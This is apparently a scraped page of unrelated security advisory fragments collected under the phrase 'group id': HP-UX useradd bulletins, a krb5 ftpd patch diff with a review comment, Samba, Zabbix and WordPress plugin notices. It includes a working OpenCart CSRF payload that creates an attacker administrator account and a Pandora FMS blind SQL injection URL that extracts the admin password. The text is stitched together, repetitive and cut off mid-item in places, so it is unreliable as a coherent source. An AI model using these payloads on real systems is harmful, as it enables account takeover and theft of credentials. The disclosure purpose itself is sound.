
group id

[security bulletin] HPSBUX02335 SSRT071454 rev.1 - HP-UX Running useradd(1M), Local Unauthorized Access

 

The patches correct the useradd behavior for the following cases: 

 * The /etc/default/useradd template file is missing 
 * The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

[security bulletin] HPSBUX02335 SSRT071454 rev.2 - HP-UX Running useradd(1M), Local Unauthorized Access

 

The patches correct the useradd behavior for the following cases: 

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

[security bulletin] HPSBUX02366 SSRT080120 rev.1 - HPUX Running useradd(1M), Local Unauthorized Access

The patches affect the useradd(1M) behavior for the following cases: 

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 


MITKRB5-SA-2011-005 FTP daemon fails to set effective group ID [CVE-2011-1526]

+++ b/configure.ac
@@ -107,6 +107,7 @@ AC_CHECK_FUNCS(_getpty cgetent getcwd getenv gettosbyname getusershell getutmp)
 AC_CHECK_FUNCS(getutmpx grantpt inet_aton initgroups isatty killpg killpg)
 AC_CHECK_FUNCS(line_push ptsname revoke rmufile rresvport_af)
 AC_CHECK_FUNCS(seteuid setlogin setpgid setpriority setresuid setreuid)
+AC_CHECK_FUNCS(setegid setregid setresgid)
 AC_CHECK_FUNCS(setutent setutsent setutxent strsave tcgetpgrp tcsetpgrp)
 AC_CHECK_FUNCS(ttyname unsetenv updwtmp updwtmpx utimes utmpname utmpxname)
 AC_CHECK_FUNCS(vhangup vsnprintf waitpid)
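Review bot: the added AC_CHECK_FUNCS(setegid setregid setresgid) line only produces the HAVE_SETEGID, HAVE_SETREGID and HAVE_SETRESGID macros, so the ftpd.c side of this change should fail the build when none of the three is detected rather than compile without an effective group ID switch, and it should check the return value of whichever call it selects. Separately, the context line two above the addition lists killpg twice; that is harmless, but it could be cleaned up while this block is being touched.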
diff --git a/gssftp/ftpd/ftpd.c b/gssftp/ftpd/ftpd.c
index fe62a9c..a150819 100644

[security bulletin] HPSBUX02366 SSRT080120 rev.2 - HPUX Running useradd(1M), Local Unauthorized Access

The corrupt /etc/default/useradd template file can cause accounts to be created with incorrect ownership and permissions. 
The patches ensure that useradd(1M) options are processed correctly in all cases. 

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 


[SECURITY] Winbind's rfc2307 & SFU nss_info plugin in Samba 3.0.25[a-c] assigns users a primary gid of 0 by default

Description
===========

The idmap_ad.so library provides an nss_info extension to Winbind
for retrieving a user's home directory path, login shell and
primary group id from an Active Directory domain controller.  This
functionality is enabled by defining the "winbind nss info"
smb.conf option to either "sfu" or "rfc2307".

Both the Windows "Identity Management for Unix" and "Services for
Unix" MMC plug-ins allow a user to be assigned a primary group

OpenCart CSRF Vulnerability

var params = {
    'username'      : 'an_attacker',
    'firstname'     : 'attack',
    'lastname'      : 'user',
    'email'         : 'some.user@randomatackerdomain.com',
    'user_group_id' : '1', // Default group id for administrator level is 1
    'password'      : 'test',
    'confirm'       : 'test',
    'status'        : '1'
};
                        

Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities

filter against sql injection. A proper fix is planned for a major version.


4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10

The parameter group_id of operation/agentes/estado_agente.php is
vulnerable to blind sql injection.


PoC:
http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281

[SECURITY] [DSA 1420-1] New zabbix packages fix privilege escalation

Debian-specific: no
CVE ID         : CVE-2007-6210
Debian Bug     : 452682

Bas van Schaik discovered that the agentd process of Zabbix, a network
monitor system, may run user-supplied commands as group id root, not
zabbix, which may lead to a privilege escalation.

For the stable distribution (etch), this problem has been fixed in version
1:1.1.4-10etch1


rPSA-2007-0184-1 samba samba-swat

    https://issues.rpath.com/browse/RPL-1705

Description:
    Previous versions of the samba package contain a Privilege Escalation
    vulnerability in which Windows users may, under some circumstances,
    incorrectly be assigned a primary group id of 0 (root).
    
    In its default configuration, rPath Linux 1 is not vulnerable to this
    Privilege Escalation.

Copyright 2007 rPath, Inc.

HTB22860: SQL Injection in WP Forum wordpress plugin

Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/wp-content/plugins/wpforum/wp-forum.php" script to properly sanitize user-supplied input in "group_id" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:



Re: [Full-disclosure] Zabbix 1.6.2 Frontend Multiple Vulnerabilities

> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
>
> $fields=array(
>  "config"=>     array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
>  // actions
>  "groupid"=>    array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
>  "hostid"=>     array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
>  "start"=>      array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
>                 PAGE_SIZE."==0)", NULL),
>  "next"=>       array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
>  "prev"=>       array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),

Zabbix 1.6.2 Frontend Multiple Vulnerabilities

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$fields=array(
 "config"=>     array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
 // actions
 "groupid"=>    array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
 "hostid"=>     array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
 "start"=>      array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
                PAGE_SIZE."==0)", NULL),
 "next"=>       array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
 "prev"=>       array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),


